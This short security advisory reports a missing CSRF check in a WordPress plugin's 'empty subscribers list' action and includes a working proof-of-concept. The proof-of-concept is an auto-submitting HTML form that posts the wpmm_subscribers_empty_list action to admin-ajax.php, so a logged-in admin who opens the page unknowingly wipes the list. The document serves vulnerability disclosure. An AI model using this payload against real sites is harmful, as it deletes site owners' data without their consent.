The plugin is lacking CSRF when emptying the subscribed users list, which could allow attackers to make a logged in admin perform such action via a CSRF attack
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="wpmm_subscribers_empty_list">
</form>
<script>
document.getElementById("test").submit();
</script>